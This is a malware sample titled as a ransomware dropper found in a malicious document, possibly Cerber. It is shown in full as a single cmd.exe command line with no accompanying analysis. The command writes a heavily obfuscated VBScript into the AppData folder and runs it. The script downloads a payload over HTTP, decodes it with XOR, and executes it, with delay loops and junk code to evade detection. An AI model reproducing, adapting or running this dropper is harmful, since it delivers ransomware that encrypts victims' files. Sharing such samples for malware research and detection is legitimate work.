Command line execution acting as a dropper - found inside a malicious document (probably cerber ransomware)

dropper.INFECTED.bat

cmd.exe /V /C set "FKO=%RANDOM%" && (for %i in ("Dim LXZxe0" "suB GdBocmWra2bHN()" "LCtcOqCDnnH=16+11" "On eRROR resUME neXt" "NVJjYA=9+60" "DIm I7U6poXRu,GiWuI,BoUfvWYBUkKj,IUJthZDvQAl" "Y9cKZng13vo=40+64" "IUJthZDvQAl="SVXQDEt1loQ6LlG"" "Q1u0qcM7Qv9Lv=98+61" "I7U6poXRu=SHpwygLQgHdJ("1C354D39787C1D224319463E002C172D5C67213C5F","MtA9IBS2U4nhQr")" "UUlJ36frjukOf=4+85" "seT GiWuI=cReaTeOBJEcT(SHpwygLQgHdJ("1B3132362A075E0A1B7F6E01200F070208",IUJthZDvQAl))" "PjtwgPXl=60+45" "GiWuI.opEN SHpwygLQgHdJ("320C31","KuIefPyEKG7jD28"),I7U6poXRu,0" "LxFoiv6rfAMR6=48+79" "GiWuI.setRequESthEaDer SHpwygLQgHdJ("1359183537","YA8vRRDzISQ1tmJ"),SHpwygLQgHdJ("51212E22364D666B4079","T3XZGEpRXr")" "D0jDQ36=89+30" "GiWuI.sEnd()" "Q30TTtK7H7DXR6BB8=65+76" "If GiWuI.STatUsTexT<>SHpwygLQgHdJ("172A1A0506562B7A0E152127173631","EGKhqo7GZMzOSrX") THen PEIwKPwhVFEYy2a" "L360=60+17" "eND Sub" "Sub NEWtZ()" "GPUDsi=67+57" "TfgjBtEZiAm1I" "Dim TlmAoztjgrep3nIj2,Umdr3G2bHN,FoHwraR,KzSFDJqxxi64,JyU1NQwdLZlhoO" "K0Q2UNY=9+6" "On ERRoR resumE nexT" "QEyWYC90=79+36" "FoHwraR="VSkUvLrA3gU"" "TdruWrPj3exh=55+60" "Set TlmAoztjgrep3nIj2=cREATEOBjecT(SHpwygLQgHdJ("043836042502351D343D333F07",FoHwraR))" "Ym5o74mmAmks5a=20+38" "BsBLNgj1dO" "ONEbMPRIwIYVMsYd1=63+56" "GdBocmWra2bHN" "P3GC43MG=28+88" "LXZxe0=TlmAoztjgrep3nIj2.ExPAndEnVironMENTStRINgs(SHpwygLQgHdJ("64361E2A2B0C362864","IAWnZOmB"))&"\"& QdJx9Z1PDLYQ8g & QdJx9Z1PDLYQ8g" "MNN6jdyTPO=30+72" "KzSFDJqxxi64="GJcYdlQRy"" "MTElyRNTSoABctWc8=42+9" "Set Umdr3G2bHN=creAteoBjecT(SHpwygLQgHdJ("070A3A1603223D1F33643B142824050629",KzSFDJqxxi64))" "QtIwMHSjI=81+18" "Umdr3G2bHN.oPeN SHpwygLQgHdJ("0C0A05","IKOQnjVPDn30N"),SHpwygLQgHdJ("31164D3103686E201E261227740650324D352832043F0B2D374C5A2E5468297E1B3B057D1B0972125C2B026132185F","BYb9A9GAPqKb") & QdJx9Z1PDLYQ8g,0" "FSiBQ=78+88" "Umdr3G2bHN.seTREQUEStheADeR SHpwygLQgHdJ("6A14285E0B","G8uF9nImsN7246"),SHpwygLQgHdJ("36133F0C45046C7C7D6747","LTjKi69XD")" "UV5RE9=87+45" "Umdr3G2bHN.SenD()" "YA9rp=9+48" "if Umdr3G2bHN.STaTuStExt=SHpwygLQgHdJ("3D1943402406344D3B5E5A39023619","Xmx14Mg") then" "MVKEbiLhvOYXdt=41+76" "BsBLNgj1dO" "R77jT20mAl=97+80" "XAzxIIf59A(4)" "AuBRD=83+25" "Of1VsR Umdr3G2bHN.reSPonSEBoDy" "CmxJlsgoTF=71+68" "Else" "AGYiQ=55+44" "JyU1NQwdLZlhoO="EonTcLOXMcQ"" "RPNWGCtUdUGKjfYLF=1+9" "SeT Umdr3G2bHN= CrEateoBJect(SHpwygLQgHdJ("22073711233C372B177F1D22221C37181F",JyU1NQwdLZlhoO))" "AAwhpMSp=43+7" "Umdr3G2bHN.oPen SHpwygLQgHdJ("200102","HgDVMMe2ev46Kgey2"),SHpwygLQgHdJ("321D4C257E78751A4D3B33362304593B2B25740A57386B3133055D676A3D2A0E071017243E3A001B2E633E1005","WZi8UD" ) & QdJx9Z1PDLYQ8g,0" "AG27Z=19+92" "Umdr3G2bHN.sETREQueSTHeadER SHpwygLQgHdJ("2A170A0404","SxvdcaNZswpqyS"),SHpwygLQgHdJ("0C09063D290F4253687E43","MnprXZ2vkY")" "SsvbqEur5CeeUh=77+89" "Umdr3G2bHN.SeND()" "R1xYoHleisTo86Wj=96+32" "If Umdr3G2bHN.STATuSTEXt=SHpwygLQgHdJ("022404040A151945173D2B02150D00","TREvpctue") thEn Of1VsR Umdr3G2bHN.reSPoNseBodY" "FvCs=53+62" "C0ucSy=55+46" "end if" "UJ8IbIVsCFjGv=56+15" "End Sub" "FuNcTiON QRvh2hg4Gd(STSvfidscYgrH0,NfHDcnoa)" "JlgsrLdhT6=37+48" "DiM Ib1AQqXCuyWo,SIaIRO8VhaIygi,DUPsa2OPa6MO,M15MngdUQi,RHjfxvqFtnGJx6,W6k35(7)" "QXTAUWhLniqc4u=45+50" "W6k35(0)=97" "W6k35(1)=107" "W6k35(2)=99" "W6k35(3)=101" "W6k35(4)=104" "W6k35(5)=99" "W6k35(6)=115" "W6k35(7)=106" "R01E5YnKt=22+57" "SEt SIaIRO8VhaIygi =crEATEobjECT(SHpwygLQgHdJ("102A1C3320172C3F0F6609080911193A3A1A3F3D2C273B0D2B3B", "JCInZPcEQhHOaet"))" "N1ZyOBMySAyS=65+75" "SeT DUPsa2OPa6MO=SIaIRO8VhaIygi.Getfile(STSvfidscYgrH0)" "FWk6zAXpGoTmS=10+95" "seT RHjfxvqFtnGJx6=DUPsa2OPa6MO.OpeNAsTeXTSTREAM(1,0)" "EQtO3nqfhh=70+22" "SEt M15MngdUQi=SIaIRO8VhaIygi.CReAtETextfilE(NfHDcnoa,1,0)" "TPvgroNba=71+19" "Ib1AQqXCuyWo=0" "Ea68RWdtmnj6w=79+49" "Do UnTIl RHjfxvqFtnGJx6.ATEndofstrEAM" "Ib1AQqXCuyWo=(Ib1AQqXCuyWo+1)\8" "M15MngdUQi.wrItE PxNLb6j(Du8g(Dydlf6fkXhjn350uE(RHjfxvqFtnGJx6.rEad(1)),W6k35(Ib1AQqXCuyWo)))" "LOOp" "KQ0NNfK8i8r=64+65" "M15MngdUQi.clOse" "OgyRDn4ALksUn4esl=69+89" "RHjfxvqFtnGJx6.Close" "QRtiU1J=67+95" "sEt RHjfxvqFtnGJx6=nOThINg" "EczC8=84+18" "seT DUPsa2OPa6MO=NOtHING" "RnJCAwjTa=3+28" "SEt M15MngdUQi=nothinG" "CAYOJs7slQJ0RlQVodhri7=40+42" "sET SIaIRO8VhaIygi=nOtHIng" "H9mWbMHe7A=5+46" "EnD FuNCTiOn" "LVVcPIl6PGoY=74+39" "Bu1P5" "suB B4uerIC()" "IdzTaoCEyuSumF=22+9" "dIm A0HqsGYQ3ES,H7a3,UvRv1uwGkvKcGwXX,BWLaQAVnq7WMbor,U7O3k6Up2H6Rh" "RzE=56+6" "UvRv1uwGkvKcGwXX=""""" "GQRO90aBOzve=68+31" "BWLaQAVnq7WMbor=PxNLb6j(32)" "JBKe5WFU9tHQRB0=45+74" "H7a3=LXZxe0 & QdJx9Z1PDLYQ8g & SHpwygLQgHdJ("56453B08","Vx1")" "SXHtBwtg3hcNgGR=79+71" "QRvh2hg4Gd LXZxe0,H7a3" "Si0CfZifkorruN7f6=30+45" "iF U7O3k6Up2H6Rh="" tHEN XAzxIIf59A(4)" "PblmhOImGi=17+69" "A0HqsGYQ3ES="T5aE4ZgUiLZj63uQ5"" "W2LWCgQmOEbxu=47+8" "cREATeoBjeCt(SHpwygLQgHdJ("62322646331721471F320F5A5F",A0HqsGYQ3ES)).Run SHpwygLQgHdJ("2E25296513223678620B6D18221B010C6D","XMHMKvZS") & UvRv1uwGkvKcGwXX & UvRv1uwGkvKcGwXX & BWLaQAVnq7WMbor & UvRv1uwGkvKcGwXX & H7a3 & UvRv1uwGkvKcGwXX,0,0" "X0jyK=61+38" "eNd SUb" "sUb TfgjBtEZiAm1I()" "H1BQk7p7M1pFs4=60+76" "On eRrOR reSume Next" "QdddoSroz=21+73" "LjUTifDPW5P 7,48" "XYe0hGtR82a2=80+67" "Qrxs9L7UJ8B=12+35" "ENd suB" "SUb PEIwKPwhVFEYy2a()" "NLQmTuz=60+16" "dIM S5qttuaJ0U,CoFlwZrTgQR8a" "VYzmN7sYw2PYt9Y2w=47+82" "Do While S5qttuaJ0U<>1" "CoFlwZrTgQR8a=CoFlwZrTgQR8a+1" "LOop" "AkIvc2ytemMGF4=35+80" "eNd SUb" "FunctIoN PxNLb6j(LVTjxxr6NN)" "NLRirO3guUg0MUwnW=60+52" "PxNLb6j=Chr(LVTjxxr6NN)" "POockigWk=29+10" "ENd FUnCTiOn" "funCTION QdJx9Z1PDLYQ8g()" "J7KD5IG5B=35+66" "QdJx9Z1PDLYQ8g=seCOnD(tIme)" "N2hIYa8hHvK=57+88" "End FUnCTiON" "sUb BsBLNgj1dO()" "JxNNdd6Aj=87+95" "Dim Uxln, OrRdQHkBaoAN" "For Uxln = 94 To 1000431" "OrRdQHkBaoAN = XCwZVdAipi18 + 37 + 10 + 18" "Next" "Hl8jPQcxAz=90+2" "enD suB" "suB Of1VsR(VGw9XYHDe)" "KH2d7yuM9R=17+94" "diM QBqMBoy2SfS,BkNEYSuxkVIfhpelB" "R10LZYLfqJZ=95+94" "BkNEYSuxkVIfhpelB="C0GqqLK8udE"" "YqnbB5DIBqlS=14+67" "seT QBqMBoy2SfS=CReateOBJect(SHpwygLQgHdJ("71033E350E656B011620225D",BkNEYSuxkVIfhpelB))" "KdlHici=53+62" "QBqMBoy2SfS.TYpe=1" "Nl3Zm25B86Ewi9=68+42" "QBqMBoy2SfS.oPEn" "RDoexzj2=49+72" "QBqMBoy2SfS.wRIte VGw9XYHDe" "TCZDTlrW04S1rbn=85+26" "QBqMBoy2SfS.sAVEToFILE LXZxe0,2" "TfhhGtEXnwUt=23+14" "seT QBqMBoy2SfS=NOthING" "VErW=7+37" "B4uerIC" "QRvYW=67+95" "End SUb" "FUNcTION Dydlf6fkXhjn350uE(WIi9HKqVudnf)" "WeOF4=51+68" "Dydlf6fkXhjn350uE=Asc(WIi9HKqVudnf)" "OOJ7hrvcYhRpk=29+70" "eNd FunCTiON" "suB Bu1P5()" "Uwko=83+33" "Dim YggA0zfBf6KN,R2bDbGZfV6,T48owEXTn" "De4a9MhO2BydV=90+85" "YggA0zfBf6KN=92899767:R2bDbGZfV6=0:T48owEXTn=0" "VoW63HZpqkts=36+61" "For R2bDbGZfV6=1 To YggA0zfBf6KN" "T48owEXTn=T48owEXTn+1" "NExt" "R2rQ4TB=25+23" "If T48owEXTn=YggA0zfBf6KN tHen" "Q7LZYLjUqLgRSY0of=35+29" "XAzxIIf59A(4)" "BOjZBGYDyA=34+32" "NEWtZ" "HVKwqWDn=79+68" "elSe" "TI6hmBXVP7MD5=70+9" "ETxAnaqiO10=6+55" "eND If" "GsnHqSQ2=16+72" "eNd SUb" "fuNCTION SHpwygLQgHdJ(KPqtwjcR3,U8UIxOh8)" "Odxuh8R3165=24+38" "diM VhY88lgV,EweXK6b8,VA5QGfRz3Gw" "E0QisHZgJ5VifGUVJ=27+56" "FOr VhY88lgV=1 tO (LEn(KPqtwjcR3)/2)" "EweXK6b8=(PxNLb6j(38)&PxNLb6j(72)&(mID(KPqtwjcR3,(VhY88lgV+VhY88lgV)-1,2)))" "VA5QGfRz3Gw=(Dydlf6fkXhjn350uE(MId(U8UIxOh8,((VhY88lgV mOD Len(U8UIxOh8))+1),1)))" "SHpwygLQgHdJ=SHpwygLQgHdJ+PxNLb6j(Du8g(EweXK6b8,VA5QGfRz3Gw))" "nExt" "HsQQRXC16O3U1=72+79" "eND fuNctIoN" "sUB XAzxIIf59A(JrXcJ7NEiI)" "LxB5SSDMa6=23+80" "DiM JlfyVLcm7W" "UGOUlQQ=16+62" "JlfyVLcm7W=TiMEr+JrXcJ7NEiI" "dO whiLE TImer<JlfyVLcm7W" "lOOp" "IClSwnO0HG=37+46" "eNd SUb" "fuNcTIOn Du8g(IPIuieHVEn,NbuFsmanCpt)" "W8rSGAxnW6EurYUTP=5+42" "Du8g=(IPIuieHVEn aND nOt NbuFsmanCpt)Or(nOt IPIuieHVEn ANd NbuFsmanCpt)" "F1Mjvj=47+27" "enD fUNctiOn") do @echo %~i)>"%appdata%\!FKO!.vbs" && start "" "%appdata%\!FKO!.vbs" && exit